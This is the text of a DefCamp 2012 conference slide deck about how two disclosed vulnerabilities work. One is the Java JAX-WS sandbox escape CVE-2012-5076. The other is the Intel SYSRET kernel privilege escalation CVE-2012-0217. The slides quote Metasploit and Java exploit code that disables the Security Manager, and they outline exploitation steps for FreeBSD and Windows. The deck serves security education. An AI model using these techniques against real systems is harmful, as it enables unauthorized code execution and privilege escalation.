How does a 0day work? - DefCamp 2012

808 views

Published on

0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
808
On SlideShare
0
From Embeds
0
Number of Embeds
2
Actions
Shares
0
Downloads
13
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

How does a 0day work? - DefCamp 2012

  1. 1. D E F C AHow does a 0day work? M P Ionut Gabriel Popescu 2 0 “Nytro” 1 https://www.rstcenter.com/forum/ 2
  2. 2. D E F Contents C A M1. Why? P2. CVE-2012-5076 23. CVE-2012-0217 0 14. Questions? 2
  3. 3. D Why E to learn how do 0days work? F C A- Not so many interested people M- A very interesting subject P- Unlimited possibilities: Windows/Linux, Java… 2- Highly technical skills 0 1- Deep understanding of “internals” 2- Don’t be a script kiddie – Metasploit?- Not so complicated at all
  4. 4. DJava Applet JAX-WS Remote Code E F CVE-2012-5076 C ADisclosure: 16 Oct 2012 MDiscovered by: Unknown POracle patch: October 2012 2Exploited: November 2012 0Java: Version 7 update 7 (7u7) 1Fastly included by: BlackHole, Nuclear Pack, RedKit… 2Metasploit module: juan vazquezAlso known as: Java drive-by
  5. 5. D E Browser Java applets can NOT: F C A - Access filesystem - Access system clipboard M - Transfer data from other server P - Load native libraries - Change Security Manager 2 - Create a Class Loader 0 - Read certain system Properties 1 2Source:- http://docs.oracle.com/javase/tutorial/deployment/applet/security.html
  6. 6. Exploit - Metasploit D E F C A M P 2 0 1 2Is this 1337?
  7. 7. ### This file is part of the Metasploit Framework and may be subject to D# redistribution and commercial restrictions. Please see the Metasploit# web site for more information on licensing and terms of use. E# http://metasploit.com/## Frequire msf/core Crequire rex Aclass Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking M include Msf::Exploit::Remote::HttpServer::HTML P include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :javascript => false }) 2 def initialize( info = {} ) super( update_info( info, 0 Name Description => %q{ => Java Applet JAX-WS Remote Code Execution, 1 This module abuses the JAX-WS classes from a Java Applet to run arbitrary Java code outside of the sandbox as exploited in the wild in November of 2012. The 2 vulnerability affects Java version 7u7 and earlier. }, License => MSF_LICENSE, Author => [ Unknown, # Vulnerability Discovery juan vazquez # metasploit module ]...................................................................................
  8. 8. D Exploit source E F paths = [ [ "Exploit.class" ], C [ "MyPayload.class" ] A ] M p = regenerate_payload(cli) P jar = p.encoded_jar 2 0Links: 1 - https://metasploit.com/svn/framework3/trunk/external/source/exploits/cve- 2 2012-5076/Exploit.java - https://metasploit.com/svn/framework3/trunk/external/source/exploits/cve- 2012-5076/MyPayload.java
  9. 9. D Cool parts E import com.sun.org.glassfish.gmbal.ManagedObjectManagerFactory; F import com.sun.org.glassfish.gmbal.util.GenericConstructor; C GenericConstructor genericconstructor = new GenericConstructor(Object.class, A "sun.invoke.anon.AnonymousClassLoader", new Class[0]); Object obj = genericconstructor.create(new Object[] {}); M Method method = ManagedObjectManagerFactory.getMethod(obj.getClass(), "loadClass", new Class[] { byte[].class }); P Class class1 = (Class)method.invoke(obj, new Object[] { //byte_payload buffer }); 2 class1.newInstance(); //System.out.println("SecurityManager:" + System.getSecurityManager()); 0 //class1.getMethod("r", new Class[0]).invoke(class1, new Object[0]); Payload.main(null); 1 //Runtime.getRuntime().exec("calc.exe"); 2 public MyPayload() { AccessController.doPrivileged(this);}public Object run() throws Exception { System.setSecurityManager(null); return null;}
  10. 10. Classes and methods D E F- GenericConstructor C- GenericConstructor.create A- sun.invoke.anon.AnonymousClassLoader M- sun.invoke.anon.AnonymousClassLoader.loadClass P- ManagedObjectManagerFactory- ManagedObjectManagerFactory.getMethod 2- Method 0- Method.invoke 1- Class 2- Class.newInstance- Payload.main(null);
  11. 11. D How does this 0day work? E F0. Abuse of “GenericConstructor” and “ManagedObjectManagerFactory” C - “GenericConstructor” and “ManagedObjectManagerFactory” – bypass Java security model A M1. Create an instance of “sun.invoke.anon.AnonymousClassLoader” P - “sun.invoke.anon.AnonymousClassLoader” – Restricted, privileged2. Call “loadClass” method from “sun.invoke.anon.AnonymousClassLoader” 2 - “loadClass” – Loads a byte[] stream class 0 13. Call the default constructor of our class, loaded using“AnonymousClassLoader” 2 - Since it is called from a privileged code, it will run privileged, disable Security Manager4. Enjoy - Do whatever you want
  12. 12. D E F C A M PQuestions? 2 0 1 2
  13. 13. D Intel SYSRET privilege escalation E CVE-2012-0217 F CDiscovered by: Rafal Wojtczuk ADisclosed: 12 April 2012 MPatched: 12 June 2012 PAffected operating systems: - FreeBSD 2 - Windows 7 0 - Linux (NO - CVE-2006-0744 - DOS) 1Just 64 bit systems are vulnerable 2Complicated, trickyOnly Intel x64 processors
  14. 14. D Intro x64 E FRegisters extended to 64 bits: RAX, RBX… RIP, RSP C - AH/L = 1B, AX = 2 bytes, EAX = 4 bytes, RAX = 8 bytes A MNew general purpose registers: P - R8, R9, R10, R11, R12, R13, R14, R15New calling convention: 2 - RCX – 1st argument 0 - RDX – 2nd argument 1 - R8 – 3rd argument - R9 – 4th argument 2 Still requires stack to be reservedWindows x64 replaced fs with gs – TIB (Thread Information Block)
  15. 15. D Why? E F- Because of “sysret” instruction C- Older system calls – very slow: Interrupts (Ex. int 0x80) A- Interrupts need to use IDT (Interrupt Dispatch Table) M- AMD: syscall/sysret, Intel: sysenter/sysexit (saves RIP in RCX) P- Intel follows AMD 64 standard (not exactly)- Just 48 bits are used (not all 64) = 256 TB of memory available 2- Must use canonical addresses (bits 48-63 == 47) 0- A #GP (General Protection) is raised for non-canonical RIP 1- On exception, exception record is pushed on the stack: error code, 2Saved: RIP, CS, RFLAGS, RSP, SS- Usermode stack is changed to kernel mode stack – “safe” one- If RSP is invalid, #DF (double fault) is raised
  16. 16. D Privileges E F C A- Main purpose: full privileges (no limitations) M- Rings: 0, 1, 2, 3 – Because segment descriptor DPL == 2 bits P- Windows and Linux uses just 0 and 3 (compatibility)- Low privilege to high privilege: system calls 2- Change from usermode to kernel mode with syscall and reverse: 0 1. RIP is in usermode, RSP is in usermode, syscall 1 2. RIP - kernel mode, RSP - usermode (replaced during system call), sysret 2
  17. 17. D E How does this 0day work? F C- What can happen during sysret: interrupts, exceptions A- Interrupts are not blocked, but are forbidden (one MSR) M- How about exceptions? #GP P- On AMD, #GP is not raised for non-canonical address in RCX (safe) 2- On Intel, if we can have RIP (depends on OS how) to a non-canonicaladdress before sysret, #GP will be raised 0- #GP is raised while CPU is in privileged mode 1- Use RSP to overwrite kernel structure to execute code with ring0 2privileges
  18. 18. Operating system specific D EFreeBSD: F 1. Place a “syscall” (0x0f, 0x05) right before a non-canonical address ((1 << 47) - 2) C 2. Set RSP to a calculated value to make sure the exception record pushed on stack will A overwrite #PF (Page Fault)’s “target” offset (raised) with a pointer to our kernelmode payload M 3. #PF will be raised (because gs is usermode) and will execute our payload P 4. Recover overwritten IDTs to avoid a triple fault (machine reboot) 2Windows: 0 1. Create an UMS scheduled thread (EnterUmsSchedulingMode) 1 2. Set RIP and RSP from TEB (Thread Environmet Block) to a non-canonical address 3. Create a new thread that will continuously overwrite return address from #GP stack after it 2 writes it but before it is read (after function call)Enjoy!
  19. 19. D E F C A M PQuestions? 2 0 1 2

×